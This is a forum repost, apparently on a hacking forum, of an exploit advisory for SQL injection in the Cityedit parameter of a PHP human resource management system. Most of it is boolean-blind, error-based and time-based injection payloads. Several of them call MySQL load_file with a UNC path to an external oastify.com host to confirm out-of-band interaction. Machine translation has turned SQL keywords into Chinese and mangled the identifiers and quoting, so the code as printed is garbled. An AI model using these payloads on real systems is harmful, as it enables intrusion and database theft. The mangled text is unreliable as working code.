H

人力资源管理系统v1.0-多个SQLI

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
## title:人力资源管理系统v1.0-多个SQLI
##作者: nu11secur1ty
## date: 04/02/2024
## vendor: https://github.com/oretnom23
## Software: https://ww.sourcecodester.com/php/1...nd-php-and-mysql-free-source-source-code.html
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
Cityedit参数似乎很容易受到SQL注入的影响
攻击。有效载荷'+(选择
load_file('\\\ rjedhdhfj6b3j1usj0eoiix43v9v9oxklbozfm5au.oastify.com \\ eii')+'
在Cityedit参数中提交。此有效载荷注入SQL
使用UNC文件路径调用MySQL的LOAD_FILE函数的子查询
这引用了外部域上的URL。应用程序
与该域进行交互,表明注射的SQL查询
被执行。
攻击者可以使用此信息从系统中获取所有信息
脆弱性!
状态:高脆弱性
[+]有效载荷:
``MySQL
---
参数: Cityedit(GET)
Type:基于布尔的盲人
title: Mysql Rlike Boolean盲人- 在哪里,订购
或小组按子句
PAYLOAD: CITDEREDIT=22'+(选择
load_file('\\\\ rjedhdhfj6b3j1usj0eoiix43v9 oxkklbozfm5au.oastify.com \\ eii'))+''''''
rlike(select(case(1759=1759),则0x3232+(选择
load_file(0x5C5C5C5C726A65646868686666A3666666A36A317575736A30656F69697834 3376396F786B6C626F7A66D3561752E6F6173746966792E636F6D5C5C656969)+'''''''''
else0x28 end))和'gmzs'='gmzs
type:基于错误的
title: mysql=5.0或基于错误的- 在哪里,有,订购或
小组划分(地板)
PAYLOAD: CITDEREDIT=22'+(选择
load_file('\\\\ rjedhdhfj6b3j1usj0eoiix43v9 oxkklbozfm5au.oastify.com \\ eii'))+''''''
或(从(选择Count(*),Concat(0x716b787671
(ELT(8880=8880,1))),0x7178626271,地板(rand(0)*2))x
信息_schema.plugins组由x)a)和'qjhk'='qjhk
Type:基于时间的盲人
Title: MySQL 5.0.12和基于时间的盲人(重查询)
PAYLOAD: CITDEREDIT=22'+(选择
load_file('\\\\ rjedhdhfj6b3j1usj0eoiix43v9 oxkklbozfm5au.oastify.com \\ eii'))+''''''
和2124=(从信息_schema.columns a中选择计数(*),
信息_schema.columns b,information_schema.columns c white 0 xor
1)和'jtnd'='jtnd
---
````````
 
后退
顶部